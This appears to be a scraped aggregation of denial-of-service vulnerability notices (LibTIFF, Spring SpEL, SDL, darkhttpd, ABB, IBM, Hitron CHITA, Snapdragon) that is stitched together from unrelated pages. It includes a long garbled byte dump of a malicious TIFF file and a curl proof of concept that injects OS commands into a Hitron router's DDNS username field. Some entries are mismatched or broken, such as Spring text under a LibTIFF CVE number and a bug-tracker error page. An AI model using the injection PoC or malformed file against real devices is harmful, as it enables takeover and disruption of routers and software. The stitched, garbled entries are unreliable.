A vulnerability classified as problematic was found in LibTIFF 4.3.0. Affected by this vulnerability is the TIFF File Handler of tiff2ps. Opening a malicious file leads to a denial of service. The attack can be launched remotely but requires user interaction. The exploit has been disclosed to the public and may be used.

II\*b�ڽѱ@� DQ,/�� �D^�"�����\]��wO\` a �Kh'7{����� �ll�Q0�>L| �mM��cv\_���W���/��}�.�������II\*���Yy.taff��@ ����� ����$(II����\_�\\�տ�������W{���s�� �?������W����������pq���?��g���a�����i���U����~�ݷ�o����O�R����z��⇀tW����m���~�����>� �\_���,���@�"���/�Р��@ �-���X'�����@p~\_��/��@ƿ�@ ����/���������U�� ����II\*V���e���?������W����������pq���?��g���a�����i���U����~�ݷ�o����O�R����z��⇀tW����m���~�����>� �\_���,���@�"���/�Р��@ �-���X'�����@p~\_��/��@ƿ�@ ����\*��������U�� ����x���p/����#��������8��Ɉ��j�\`o�H6@��$���������<��� ���i��� ���֔@�m�������@���~��?k���������� ?��������II�MM\*�����������\]���h8z (��S\[8���������T��P������� � ���t?����\`�����?������� �������kl�>E �/��������<�������9@<����w��ko��j�������Xp�'k�Z�M�MV�/k�I��T��x��d�����x�����o����@�������0�(�������w�������?�������=����?��\]��?� �=}��;���^���:������ߥ���(�G�g����?�����������n�?������ww\[����H���c���ڻ��?�H�?���{����g�����?�����o�����-@�(�������\_��2D\`�\_������0�(�������w�������?�������=����?��\]��?� �=}��;���^���:������ߥ���(�G�g����?�����������n�?������ww\[����H���c���ڻ��?�H�?���{����g�����?�����o�����-@�(�������\_��2D\`�\_������\]�����?�?���y��w��/����7���������V@����������������w����\_�\\�տ�������W{���s�� �?������W����������pq���?��g���a�����i���U����~�ݷ�o����O�R����z��⇀tW����m���~�����>� �\_���,���@�"���/�Р��@ �-���X'�����@p~\_��/��@ƿ�@ ����/���������U�� ����x���p/����#��������8��Ɉ��j )II\*���Yy.taff��@ ����� �����$(II@� @:��(X(; XR�SClose up o�II\*V=���e��II\*bx�W���/��}�.0z� ����MM\*������8����\]���h8z (��S\[8���������T��P������� � ���t?����\`�����?������� �������kl�>E �/��������<�������9@<����w��ko��}��������Xp�'k�Z�M�MV�/k�I��T��x��d�����x�����o����@�������0�(�������w�������?�������=����?��\]��?� �=}��;���^���:������ߥ���(�G�g����?�����������n�?������ww\[����H���c���ڻ��?�H�?���{����g�����?�����o�����-@�(�������\_��2D\`�\_������\]�����?�?���y��w��/����7���������V@����������������w����\_�\\�տ�������W{���s�� II\*bx�W���/��}�.0z� ����MM\*������8����\]���h8z (��S\[8�����-����T��P������� � ���t?����\`�����?������� �������kl�>E �/��������<�������9@<����w��ko��j��������Xp�'k�Z�M�MV�/k�I��T��x��d�����x�����o����@����=e��\`o�H6@��$���������<��� ���i��� ���֔@�m�������@���~�����?k���0�����Vx

CVE-2022-1210

n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

All Vulnerability Reports

**CVE-2022-22950: Spring Expression DoS Vulnerability**  
**Severity**

Medium

**Vendor**

Spring by VMware

**Description**

In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0 - 5.2.19, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

**Affected VMware Products and Versions**

Severity is medium unless otherwise noted.

*   Spring Framework
    *   5.3.0 to 5.3.16
    *   5.2.0 to 5.2.19
    *   Older, unsupported versions are also affected

**Mitigation**

Users of affected versions should apply the following mitigation: 5.3.x users should upgrade to 5.3.17+. 5.2.x users should upgrade to 5.2.20+. No other steps are necessary. Releases that have fixed this issue include:

*   Spring Framework
    *   5.3.17+
    *   5.2.20+

**Credit**

This vulnerability was initially discovered and responsibly reported by 4ra1n.

**References**

*   https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
*   https://cwe.mitre.org/data/definitions/770.html

**History**

2022-03-28: Initial vulnerability report published.  
2022-04-05: Clarification that fix was backported to Spring Framework 5.2.20.

CVE-2022-22950: CVE-2022-22950 | Security

There is a heap overflow problem in video/SDL_pixels.c in SDL (Simple DirectMedia Layer) 2.x to 2.0.18 versions. By crafting a malicious .BMP file, an attacker can cause the application using this library to crash, denial of service or Code execution.

@@ -947,7 +947,7 @@ Map1to1(SDL\_Palette \* src, SDL\_Palette \* dst, int \*identical)

}

\*identical = 0;

}

map = (Uint8 \*) SDL\_malloc(src->ncolors);

map = (Uint8 \*) SDL\_calloc(256, sizeof(Uint8));

if (map == NULL) {

SDL\_OutOfMemory();

return (NULL);

@@ -971,7 +971,7 @@ Map1toN(SDL\_PixelFormat \* src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,

SDL\_Palette \*pal = src->palette;

  

bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);

map = (Uint8 \*) SDL\_malloc(pal->ncolors \* bpp);

map = (Uint8 \*) SDL\_calloc(256, bpp);

if (map == NULL) {

SDL\_OutOfMemory();

return (NULL);

CVE-2021-33657: Always create a full 256-entry map in case color values are out of range · libsdl-org/SDL@8c91cf7

A flaw was found in darkhttpd. Invalid error handling allows remote attackers to cause denial-of-service by accessing a file with a large modification date. The highest threat from this vulnerability is to system availability.

'1893725?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-25691: Invalid Bug ID

All Vulnerability Reports

Severity

Medium

Vendor

Spring by VMware

Description

In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

Affected VMware Products and Versions

Severity is medium unless otherwise noted.

*   Spring Framework
    *   5.3.0 to 5.3.16
    *   Older, unsupported versions are also affected

Mitigation

Users of affected versions should upgrade to 5.3.17+. No other steps are necessary. Releases that have fixed this issue include:

*   Spring Framework
    *   5.3.17+

Credit

This vulnerability was initially discovered and responsibly reported by 4ra1n.

References

*   https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
*   https://cwe.mitre.org/data/definitions/770.html

History

2022-03-28: Initial vulnerability report published.

CVE-2022-22950: CVE-2022-22950: Spring Expression DoS Vulnerability | Security

Improper Input Validation vulnerability in ABB 800xA, Control Software for AC 800M, Control Builder Safe, Compact Product Suite - Control and I/O, ABB Base Software for SoftControl allows an attacker to cause the denial of service.

CVE-2021-22277

IBM App Connect Enterprise Certified Container Dashboard UI (IBM App Connect Enterprise Certified Container 1.5, 2.0, 2.1, 3.0, and 3.1) may be vulnerable to denial of service due to excessive rate limiting.

CVE-2022-22404: IBM X-Force Exchange

Hitron CHITA 7.2.2.0.3b6-CD devices contain a command injection vulnerability via the Device/DDNS ddnsUsername field.

Hitron CHITA OS Command Injection (UPC Branded)

\# Exploit Title: Hitron CHITA OS Command Injection to DoS

\# Software: Hitron Technologies CHITA Router Firmware (UPC branded)

\# Version: 7.2.2.0.3b6-CD

\# Author: \`zaeek\` (GBTI SA)

\# CVE: TBA

\# CWE: CWE-77 | CWE-400

\# Date: 15.04.2021

\# CVSSv3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Summary: A command injection vulnerability in Hitron CHITA router allows execution of OS commands. The injection vector resides at dynamic dns services "dyndns" configuration logic.

Due to improper sanitization of user-supplied data it is possible to input addition OS shell syntax together using a semicolon. To exploit this vulnerability, the attacker must be authenticated for web access.

Additionally it is possible to cause a Denial of Service by injecting a command which isn't limited by any argument (like \`ping\` command without \`-c\` delimiter), rendering the router software unstable and in the end, impossible to handle HTTP requests to web panel.

Even after router restart, the injected command is started during router startup, causing the router to being unusable without hard factory reset.

The Denial of Service case is a subject to deeper testing, because of the limited time which we were given to test it, together with the lack of second router to confirm the reproducibility.

PoC:

curl 'http://192.168.0.1/1/Device/DDNS' \\

\-H 'User-Agent: Mozilla/5.0 Firefox/85.0' \\

\-H 'Accept: application/json, text/javascript, \*/\*; q=0.01' \\

\-H 'Accept-Language: en-US,en;q=0.5' \\

\--compressed \\

\-H 'Content-Type: application/x-www-form-urlencoded' \\

\-H 'X-HTTP-Method-Override: PUT' \\

\-H 'X-Requested-With: XMLHttpRequest' \\

\-H 'Origin: http://192.168.0.1' \\

\-H 'DNT: 1' \\

\-H 'Authorization: Basic YWRtaW46YWNldHlsb2Nob2xpbmE=' \\

\-H 'Connection: keep-alive' -H 'Referer: http://192.168.0.1/webpages/index.html' \\

\-H 'Cookie: sessionindex=0&userid=e9JwY6BG6rPLnFXUM1mV6gK5Zxq7ND4Z; sessionToken=1586484992; SID=3920641792; preSession=nMQLZPa3pyBqbTvFmg7Eddn1QdxDX9n6; modelname=CHITA; LANG\_COOKIE=en\_US; isEdit=1; isEdit1=0; isEdit2=0; isEdit3=0; PHPSESSID=805d894df5e7cc7d3a39eecee5ca3824' \\

\-H 'Pragma: no-cache' \\

\-H 'Cache-Control: no-cache' \\

\--data-raw 'model=%7B%22errCode%22%3A%22000%22%2C%22errMsg%22%3A%22%22%2C%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsSrvProvider%22%3A1%2C%22ddnsUsername%22%3A%22d\[\*\*INJECT CMD WITH SEMICOLON\*\*\]d%22%2C%22ddnsPassword%22%3A%22a%22%2C%22ddnsHostnames%22%3A%22asdasd.zapto.org%22%2C%22ddnsUpdateInterval%22%3A%22604800%22%2C%22id%22%3A%221%22%7D&csrf=1lomnjjnqtc00.771727mgis8w&\_method=PUT'

In the above curl example, an OS command inject vulnerability allows to execute local system binaries by replacing \`ddnsUsername\` parameter input or concatenating with direct OS command.

The injected command will be executed, most likely with root privileges. If the injected command is continuous (like no \`-c\` delimiter for \`ping\`), it will cause denial of service situation, because of underlying DDNS handler which is never finished.

CVE-2022-25017: Hitron CHITA OS Command Injection (UPC Branded)

An Out of Bounds read may potentially occur while processing an IBSS beacon, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music

Tag

#dos